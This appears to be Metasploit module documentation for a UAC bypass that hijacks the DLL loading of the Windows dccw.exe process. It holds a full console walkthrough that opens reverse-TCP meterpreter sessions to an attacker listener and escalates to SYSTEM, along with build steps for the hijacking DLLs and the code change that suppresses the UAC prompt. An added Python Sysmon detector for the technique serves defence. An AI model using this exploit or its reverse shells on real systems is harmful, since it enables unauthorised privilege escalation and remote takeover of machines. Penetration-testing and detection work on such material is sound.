Vulnerable Application
This module adds a bypass for UAC that relies on DLL hijacking of the dccw.exe process. It has been tested on and supports both x86 and x64 releases of Windows 8, 8.1, 10_1511, 10_1607, and 10_1703. It does not work with any versions of Windows 7.
Not Applicable; works on stock Windows releases.
Running Example:
> use exploit/multi/handler
> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
> set LHOST <MSF_IP>
LHOST => <MSF_IP>
> set LPORT 30009
LPORT => 30009
> show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST <MSF_IP> yes The listen address
LPORT 30009 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
> run -z
[*] Started reverse TCP handler on <MSF_IP>:30009
[*] Starting the payload handler...
[*] Sending stage (957487 bytes) to <Win10x86_IP>
[*] Meterpreter session 1 opened (<MSF_IP>:30009 -> <Win10x86_IP>:50041) at 2017-10-03 12:17:42 -0700
[*] Session 1 created in the background.
> sessions -C sysinfo
[*] Running 'sysinfo' on meterpreter session 1 (<Win10x86_IP>)
Computer : WIN10X86-1511
OS : Windows 10 (Build 10586).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 4
Meterpreter : x86/windows
> sessions -C ifconfig
[*] Running 'ifconfig' on meterpreter session 1 (<Win10x86_IP>)
Interface 1
============
Name : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
Interface 2
============
Name : Teredo Tunneling Pseudo-Interface
Hardware MAC : 00:00:00:00:00:00
MTU : 1280
IPv6 Address : 2001:0:4137:9e76:38b8:1e49:3f57:795f
IPv6 Netmask : ffff:ffff:ffff:ffff::
IPv6 Address : fe80::38b8:1e49:3f57:795f
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 3
============
Name : Intel(R) 82574L Gigabit Network Connection
Hardware MAC : 00:0c:29:73:25:67
MTU : 1500
IPv4 Address : <Win10x86_IP>
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::cc97:6548:c10a:f034
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 6
============
Name : Microsoft ISATAP Adapter #2
Hardware MAC : 00:00:00:00:00:00
MTU : 1280
IPv6 Address : fe80::5efe:c0a8:86a0
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
> sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/windows WIN10X86-1511\msfuser @ WIN10X86-1511 <MSF_IP>:30009 -> <Win10x86_IP>:50041 (<Win10x86_IP>)
> use exploit/windows/local/bypassuac_injection_winsxs
> set session 1
session => 1
> set target 0
target => 0
> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
> set lhost <MSF_IP>
lhost => <MSF_IP>
> set lport 30010
lport => 30010
> set verbose true
verbose => true
> show options
Module options (exploit/windows/local/bypassuac_injection_winsxs):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST <MSF_IP> yes The listen address
LPORT 30010 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x86
> run -j
[*] Exploit running as background job.
[*] resource (/home/msfuser/rapid7/test_artifacts/test_rc/windows-meterpreter-reverse_tcp-192x168x134x160-30009.rc)> Ruby Code (13 bytes)
[*] Started reverse TCP handler on <MSF_IP>:30010
[*] resource (/home/msfuser/rapid7/test_artifacts/test_rc/windows-meterpreter-reverse_tcp-192x168x134x160-30009.rc)> Ruby Code (12 bytes)
[+] Windows 10 (Build 10586). may be vulnerable.
[*] UAC is Enabled, checking level...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Creating temporary folders...
[*] Uploading the Payload DLL to the filesystem...
[*] Payload DLL 18944 bytes long being uploaded...
[*] Spawning process with Windows Publisher Certificate, to inject into...
[*] Injecting into process ID 3476
[*] Opening process 3476
[*] Injecting struct into 3476
[*] Executing payload
[+] Successfully injected payload in to process: 3476
[*] Sending stage (957487 bytes) to <Win10x86_IP>
[*] Meterpreter session 2 opened (<MSF_IP>:30010 -> <Win10x86_IP>:50078) at 2017-10-03 12:19:03 -0700
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the file specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the file specified.
[+] All the dropped elements have been successfully removed
> sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/windows WIN10X86-1511\msfuser @ WIN10X86-1511 <MSF_IP>:30009 -> <Win10x86_IP>:50041 (<Win10x86_IP>)
2 meterpreter x86/windows WIN10X86-1511\msfuser @ WIN10X86-1511 <MSF_IP>:30010 -> <Win10x86_IP>:50078 (<Win10x86_IP>)
> sessions -C getuid
[*] Running 'getuid' on meterpreter session 1 (<Win10x86_IP>)
Server username: WIN10X86-1511\msfuser
[*] Running 'getuid' on meterpreter session 2 (<Win10x86_IP>)
Server username: WIN10X86-1511\msfuser
> sessions -C getsystem
[*] Running 'getsystem' on meterpreter session 1 (<Win10x86_IP>)
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[*] Running 'getsystem' on meterpreter session 2 (<Win10x86_IP>)
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
> sessions -C getuid
[*] Running 'getuid' on meterpreter session 1 (<Win10x86_IP>)
Server username: WIN10X86-1511\msfuser
[*] Running 'getuid' on meterpreter session 2 (<Win10x86_IP>)
Server username: NT AUTHORITY\SYSTEM
> exit -y
Compiling Instructions
Compiling Template DLLs
To build the x86 template DLL, use data/templates/src/pe/dll_gdiplus/build.sh (requires the mingw-w64 package from apt):
cd data/templates/src/pe/dll_gdiplus
./build.sh
cp data/templates/src/pe/dll_gdiplus/template_x86_windows.dll data/templates/template_x86_windows_dccw_gdiplus.dll
To build the x64 binary (in an x64 VS2013 command prompt):
Z:\metasploit-framework\data\templates\src\pe\dll_gdiplus>cl.exe -LD template.c /Zl /GS- /DBUILDMODE=2 /link /entry:DllMain "kernel32.lib"
cp data/templates/src/pe/dll_gdiplus/template.dll data/templates/template_x64_windows_dccw_gdiplus.dll
Compiling bypassuac-x86.dll and bypassuac-x64.dll
Open the Visual Studio solution located in metasploit-framework/external/source/exploits/bypassuac_injection/. Choose Release from the solution configurations and build the x86 and x64 solutions. The binaries should already be in the right place.
(From PR)
I decided to create a different module and not to update the one called "bypassuac_injection", because in order to perform a DLL hijacking, I need to create several folders in which to insert our malicious DLL. Also, I deleted these files and folders in a different way, instead of using the method "register_file_for_cleanup()", so as to be able to remove the created folders and also prevent a very large output.
If you want to understand the module in a deeper way, I recommend you visit the C++ project on my GitHub: https://github.com/L3cr0f/DccwBypassUAC
DLL INJECTION
/metasploit-framework/external/source/exploits/bypassuac_injection/dll/src/Exploit.cpp
/metasploit-framework/data/post/bypassuac-x64.dll
/metasploit-framework/data/post/bypassuac-x86.dll
To perform the DLL hijacking we need to copy the file of our interest to a specific location (in our case "C:\Windows\System32") using IFileOperation. To do so, first we need to inject a DLL that will perform this task. This DLL is almost the same as the one used in the "bypassuac_injection" module, but, in the latest Windows 10 systems (build equal to or greater than 15003), IFileOperation must be invoked in a different way so as to not trigger the UAC prompt. This modification will be:
if (pFileOp->SetOperationFlags(FOF_NOCONFIRMATION | FOF_NOERRORUI | FOF_SILENT | FOFX_SHOWELEVATIONPROMPT | FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION) != S_OK)
to
if (pFileOp->SetOperationFlags(FOF_NOCONFIRMATION | FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION) != S_OK)
Note that this modification does not affect other modules. To conclude this section, I didn't find the code of "/metasploit-framework/data/post/bypassuac-[ARCH].exe" to update it.
DLL HIJACKING
/metasploit-framework/data/templates/template_x86_windows_dccw_gdiplus.dll
/metasploit-framework/data/templates/template_x64_windows_dccw_gdiplus.dll
/metasploit-framework/data/templates/src/pe/dll_gdiplus/template.c
/metasploit-framework/data/templates/src/pe/dll_gdiplus/template.h
/metasploit-framework/data/templates/src/pe/dll_gdiplus/template.def
/metasploit-framework/data/templates/src/pe/dll_gdiplus/template.rc
/metasploit-framework/data/templates/src/pe/dll_gdiplus/build.sh
/metasploit-framework/lib/msf/core/exploit/exe.rb
/metasploit-framework/lib/msf/util/exe.rb
To execute code at high integrity we need to perform a DLL hijacking, but we cannot use the DLL templates provided by Metasploit since we need to forward some functions to the legit DLL, so we need to create a new pair of DLL templates, which are exactly the same but include the forwarding feature (the way I have implemented it does not work on Windows 7). Now, despite working successfully, I think it would be great to include this forwarding feature on the fly, I mean, without having to create an additional DLL template. I don't know how this can be done, so if you come up with something, let me know.
Also, to load the previous DLL template we have modified the mentioned "exe.rb" files.
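As an added defender-side example (not part of the module or of the PR above): a small Python detector over constructed Sysmon Event ID 7 (image load) records that flags the auto-elevating dccw.exe loading a GdiPlus.dll that is unsigned, not Microsoft-signed, or outside a trusted directory baseline. The flattened record format, the sample paths and the TRUSTED_DLL_DIRS baseline are assumptions made for this example.

```python
from typing import Dict, List, NamedTuple, Optional

# Sysmon Event ID 7 (image load) records flattened to "key=value|key=value".
# Constructed sample events for this example; not output from the page's run.
SAMPLE_EVENTS = """\
EventID=7|Image=C:\\Windows\\System32\\dccw.exe|ImageLoaded=C:\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_PLACEHOLDER\\GdiPlus.dll|Signed=true|Signature=Microsoft Windows
EventID=7|Image=C:\\Windows\\System32\\dccw.exe|ImageLoaded=C:\\Windows\\System32\\GdiPlus.dll|Signed=false|Signature=
EventID=7|Image=C:\\Windows\\System32\\notepad.exe|ImageLoaded=C:\\Windows\\System32\\GdiPlus.dll|Signed=false|Signature=
EventID=7|Image=C:\\Windows\\System32\\dccw.exe|ImageLoaded=C:\\Users\\Public\\GdiPlus.dll|Signed=true|Signature=Microsoft Windows
"""

# Directories from which dccw.exe is expected to load its GdiPlus dependency.
# Assumption for this example: take the real baseline from a known-good host.
TRUSTED_DLL_DIRS = ("c:\\windows\\winsxs\\", "c:\\windows\\system32\\")


class Finding(NamedTuple):
    loader: str
    dll: str
    reason: str


def parse_event(line: str) -> Dict[str, str]:
    """Split one flattened Sysmon record into a field dict."""
    return dict(f.split("=", 1) for f in line.strip().split("|") if f)


def check_event(ev: Dict[str, str]) -> Optional[Finding]:
    """Flag dccw.exe loading a GdiPlus.dll that is unsigned, not signed by
    Microsoft, or loaded from outside the trusted directory baseline."""
    if ev.get("EventID") != "7":
        return None
    loader, dll = ev.get("Image", ""), ev.get("ImageLoaded", "")
    if not loader.lower().endswith("\\dccw.exe"):
        return None
    if dll.lower().rsplit("\\", 1)[-1] != "gdiplus.dll":
        return None
    if ev.get("Signed", "").lower() != "true":
        return Finding(loader, dll, "unsigned GdiPlus.dll loaded by auto-elevating dccw.exe")
    if not ev.get("Signature", "").startswith("Microsoft"):
        return Finding(loader, dll, "GdiPlus.dll signed by a non-Microsoft publisher")
    if not dll.lower().startswith(TRUSTED_DLL_DIRS):
        return Finding(loader, dll, "GdiPlus.dll loaded from outside trusted directories")
    return None


def scan(text: str) -> List[Finding]:
    """Run check_event over every non-empty record and collect the findings."""
    events = (parse_event(l) for l in text.splitlines() if l.strip())
    return [f for f in map(check_event, events) if f is not None]
```

On the constructed input, scan() returns two findings: the unsigned System32 copy and the Microsoft-signed copy loaded from C:\Users\Public; the legitimate WinSxS load and the notepad.exe load are ignored.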
Set up the vulnerable environment
The vulnerable environment setup is the same as for the module "bypassuac_injection": we need a meterpreter session, select the architecture (0 for x86 and 1 for x64), select the meterpreter payload based on the architecture we want to execute with high integrity, and set the regular parameters of the payload (LHOST, LPORT, etc.).